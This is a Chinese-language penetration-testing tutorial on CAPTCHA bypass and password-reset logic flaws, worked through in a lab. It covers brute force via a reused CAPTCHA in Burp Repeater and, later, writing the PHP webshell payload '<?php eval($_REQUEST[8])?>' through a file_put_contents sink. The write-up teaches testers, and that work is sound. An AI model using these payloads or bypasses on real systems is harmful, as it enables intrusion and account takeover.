逻辑漏洞之验证码绕过、密码找回漏洞
一、验证码绕过
验证码: 区分用户是人还是计算机的全自动程序
验证码的作用:
1、防止恶意破解密码
2、防止论坛灌水
验证码绕过:
1、识别法(通过编写脚本实现)
2、逻辑绕过法(开发写验证码的校验的时候逻辑产生了问题)
验证码绕过常见姿势:
1、前端校验验证码(这个懂得都懂),相当于没有,直接抓包或者禁用JS
2、验证码虽然设置了,但是并没有校验,随便输也能验证成功
3、验证码可重复使用
4、验证码空值绕过
5、验证码有规则,比如是时间戳的后六位
6、万能验证码,000000,一般在设备上面偏多、硬件设备
7、验证码藏在cookie里面
8、多次登陆错误以后,才需要输验证码
一般是基于session
session:存在服务器上面的(相当于户籍管理系统里的数据)
cookie:存在客户端(相当于身份证),绑定session
基于ip
我们可以利用X - Foworded -for 来进行跑包
基于用户,这个可以爆破用户
我们进入靶场:
进入网站后台,输入账号和密码,我们可以看到,输入admin和123456显示账号或密码错误,而输入testq和123456就会显示账户不存在,这里就可以尝试绕过验证码来进行爆破密码了
我们这里登陆的时候用Burp抓包,将包放到Repeater模块,然后点击放包,显示账户或密码不匹配,我们再把账户改掉,这里又显示账户不存在,并没有显示验证码错误,所以这里就存在验证码重复利用,如果我们回到Proxy模块,将包放掉,我们再到Repeater模块,点击go,这里就会显示验证码错误,所以这个绕过的核心是不能将这个抓到的数据包放掉
二、密码找回
有一类验证码,他并不是区分用户是计算机还是人的公共全自动程序,他是用来证明你的身份的,例如短信验证码、邮箱验证码
1、验证码返回给客户端
当你在点击发送验证码之后抓他的返回包,返回包里就会有验证码的内容
2、业务流程缺陷
一般找回密码分为三个步骤:发验证码 --> 校验页面 --> 修改页面
如果我们在发验证码的时候,直接能去访问修改页面,那么这就是业务流程缺陷
如果传参加密了,他可能是:①JS前端加密,我们就需要看它的代码来分析加密方式,②后端加密,这时候我们就需要去找他加密的数据包,将它截住,然后把我们想要添加的数据加进去,③之前数据包隐藏域的返回,④强行猜解,MD5、Base64、URL等加密方式,看它的1加密为了什么字符,2加密为了什么字符,一个一个猜
3、验证码无时间间隔限制
4、验证码可爆破
5、越权漏洞
通过改包输入自己的手机号然后修改别人的密码
现在进入到我们之前登录上的靶场:
我们在当前页面刷新抓包,将包放到repeater模块,右键选择有request的那个选项,将传参方式改为POST,我们输入?x=m ,filename=66.php&content=<?php eval($_REQUEST[8])?>,然后在网站主页访问66.php?8=phpinfo();我们就会发现我们能访问他的php探针了,现在我们搞到这套源码来分析一下
使用Seay源码审计工具,全局搜索file_put_contents(这个函数,然后找到我们可利用的点
我们可以一个一个看过去,直到找到我们能利用的地方,这里我们看第十个,这里我们看源码就可以知道,我们之前为什么要那么写了,$x=m是必须的条件,只有进入到这个循环,我们才能写马,而后面的filename=66.php&content=<?php eval($_REQUEST[8])?>就是我们写的马子的内容和名称,
逻辑漏洞之验证码绕过、密码找回漏洞相关推荐
- 验证码绕过、密码找回漏洞简介
文章目录 一.验证码的作用 二.验证码绕过的常见姿势 (一)前端验证 (二)验证码无验证 (三)验证码可重复使用 (四)验证码空值绕过 (五)用脚本识别验证码 (六)验证码出现在前端代码中 (七)验证 ...
- 100.网络安全渗透测试—[常规漏洞挖掘与利用篇16]—[密码找回漏洞与测试]
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一.密码找回漏洞与测试 1.密码找回漏洞简介 2.密码找回漏洞测试 (1)源码审计:forget.php (2) ...
- 验证码绕过与密码找回漏洞
一.验证码简介 验证码(CAPTCHA)是"Completely Automated Public Turing test to tell Computers and Humans Apar ...
- web安全:验证码绕过、密码找回漏洞
0x00 验证码的作用 可以防止恶意破解密码,刷票,恶意灌水,有效防止某一黑客对某一个特定注册用户用特定程序暴力破解方法进行不断的登录尝试. 0x01 验证码绕过的常见姿势 1.前端验证验证码,并没有 ...
- 逻辑漏洞之密码找回漏洞(semcms)
目录 什么是密码找回漏洞 一般流程 可能产生该漏洞的情况 脑洞图 1.用户凭证暴力破解 2.返回凭证 3.邮箱弱token 4.用户凭证有效性 5.重新绑定 6.服务器验证 7.用户身份验证 8.找回 ...
- 国外众测之密码找回漏洞
原文出处: 国外众测之密码找回漏洞 - 先知社区 (aliyun.com) 前言 最近一直在看国外众测的文章,偶尔也逛逛hackerone,发现公布的漏洞中存有不少的逻辑漏洞,毕竟在hackerone ...
- 任意密码登录——密码找回漏洞
警告 请勿使用本文提到的内容违反法律. 本文不提供任何担保. 一.漏洞存在的点 密码找回的凭证太弱,如只需要填入一个四位或者六位的纯数字就可以重置密码,导致可以暴力破解. 密码找回凭证可从客户端直接获 ...
- 弱口令漏洞与验证码绕过——渗透day04
目录 一.基于远程服务的弱口令攻击 (一)服务暴力破解软件 (二)实验 二.基于web的弱口令测试 (一)基于表单的暴力破解 (二)验证码绕过(on client) 1.通过Script Blocke ...
- XSS漏洞利用---PHPMyWind 任意密码重置漏洞
[漏洞详情] 1.PHPMyWind是一套基于PHP和MySQL并符合W3C标准的企业网站建设解决方案,拥有着较大的用户群体(根据PHPMyWind官网介绍,已下载超15万次),受影响的版本是5.3- ...
最新文章
- from beautifulsoup4 import BeautifulSoup 报错
- 程序包管理rpm、yum与简单编译安装程序
- 静态方法中不能new内部类的实例对象的总结
- CSS学习笔记(十四) 我们前端是怎么跟设计师沟通的
- 大数据学习笔记51:Flume Channel Selectors(Flume通道选择器)
- c语言 消息框,C# McssageBox:消息框
- java中怎样调用抽象类中的非抽象方法?(对原文做修改,加入一点自己理解)
- 如何设置一个严格30分钟过期的Session 1
- pcl学习之kd-tree
- python自动下载邮件附件
- matlab 载波相位估计,光纤通信相干检测系统中波形处理与载波相位估计的研究...
- 数据结构最常用的排序算法一(冒泡、插入、选择)-Java实现
- 基于Python3.6和Opencv3的活动轮廓模型--CV和RSF
- 使用word2vec预训练模型提取DNA/RNA序列特征向量
- 账单分期和最低还款之间的差距你绝对想不到,以广发卡为例子,看看自动分期的好处。
- C++ tbb 并发容器适用场景 concurrent_set concurrent_map concurrent_queue
- 虾皮API接口—按关键字搜索商品
- Vue中gsap库实现数字递增动画
- Phoenix创建盐表
- 《计算机网络自顶向下方法》笔记
热门文章
- 手机投屏电视怎么设置?三种方法任你选择,都超简单!
- iOS App开发:最好的设计和开发工具
- Q1营收19.4亿增收不增利,更名后的跟谁学如何走向“高途”?
- VGGNet架构解析
- Android 装备选择
- c语言--函数指针数组
- 容错性低是什么意思_王者荣耀容错性低英雄盘点!玩家看不起他们!
- Android代码删除通知,Android 删除 未接来电 通知
- ​ChatGPT 国产平替上线;FTC 阻止微软 690 亿美元收购动视暴雪;PHP 8.2.0 发布|极客头条
- 红米k30至尊版和k30 pro哪个好 参数配置区别